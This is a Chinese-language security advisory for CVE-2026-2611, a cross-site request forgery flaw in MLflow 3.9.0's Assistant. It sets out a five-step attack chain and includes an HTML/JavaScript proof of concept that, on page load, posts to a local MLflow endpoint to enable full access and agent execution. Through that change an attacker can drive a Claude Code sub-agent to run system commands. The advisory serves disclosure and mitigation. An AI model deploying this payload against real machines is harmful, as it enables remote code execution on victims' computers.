CVE-2026-2611 CVSS 9.6 严重

CVE-2026-2611 MLflow Assistant CSRF导致RCE漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2611

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MLflow

漏洞概述

MLflow 3.9.0版本的Assistant功能存在严重的跨站请求伪造（CSRF）漏洞。由于/ajax-api端点缺乏严格的源验证，攻击者可诱导用户访问恶意网页，利用跨源请求绕过本地回环限制。攻击者能借此修改Assistant配置，启用完全访问权限，进而通过Claude Code子代理在受害者机器上执行任意系统命令，造成严重的安全风险。

技术细节

该漏洞的核心在于MLflow Assistant组件在处理/ajax-api接口请求时，未对HTTP请求头中的Origin字段进行有效校验。尽管服务通常绑定在localhost，旨在提供本地服务，但浏览器同源策略（SOP）允许本地服务接受来自任意域的跨域请求（若未明确禁止）。攻击者构造恶意网页，当受害者浏览时，网页脚本自动向本地运行的MLflow服务发送特制的AJAX请求。由于缺乏认证机制（PR:N）和源验证，服务器误认为请求来自可信的前端。攻击者利用此漏洞修改Assistant的内部配置，特别是解除安全限制，激活Claude Code子代理的高权限模式。这一过程绕过了原本设计的仅限本地访问的防护机制。随后，攻击者可向该代理发送指令，利用其执行系统命令的能力，实现远程代码执行（RCE）。由于CVSS评分高达9.6，该漏洞结合了网络攻击向量、无需认证、高机密性/完整性/可用性影响等特征，对用户数据及系统安全构成极高威胁。

攻击链分析

STEP 1

1. 诱骗受害者

攻击者创建一个包含恶意脚本的网页，并诱导正在运行MLflow 3.9.0的用户访问该页面。

STEP 2

2. 发起跨源请求

受害者浏览器加载恶意页面后，脚本自动向本地运行的MLflow Assistant /ajax-api端点发送POST请求。

STEP 3

3. 绕过验证

由于MLflow未进行严格的Origin验证，请求被服务器接受，绕过了仅限本地的限制。

STEP 4

4. 修改配置

攻击者通过请求修改Assistant的配置，启用完全访问权限并激活Claude Code子代理。

STEP 5

5. 执行命令

攻击者利用获得的权限，通过子代理接口在受害者机器上执行任意系统命令，实现RCE。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-2611: MLflow Assistant CSRF leading to RCE
  This HTML page demonstrates how a malicious site can send a forged request to the local MLflow instance.
  Assuming the endpoint is /ajax-api/assistant/config and the parameter enables full access.
-->
<html>
  <body>
    <h2>MLflow Assistant CSRF PoC</h2>
    <script>
      function exploit() {
        // Target the local MLflow Assistant API endpoint
        var target = 'http://127.0.0.1:5000/ajax-api/assistant/config';
        
        // Payload to modify configuration and enable full access/command execution
        var data = JSON.stringify({
          "allow_full_access": true,
          "enable_agent_execution": true
        });

        fetch(target, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: data,
          credentials: 'include' // Sends cookies if the browser has them
        }).then(response => {
          console.log('Request sent to local MLflow instance');
        }).catch(error => {
          console.error('Exploit failed:', error);
        });
      }

      // Trigger the attack on page load
      window.onload = exploit;
    </script>
  </body>
</html>

影响范围

MLflow 3.9.0

MLflow < 3.10.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用MLflow Assistant功能。同时，确保本地防火墙规则阻止外部对MLflow端口的访问，并避免在浏览不可信网页时运行MLflow服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表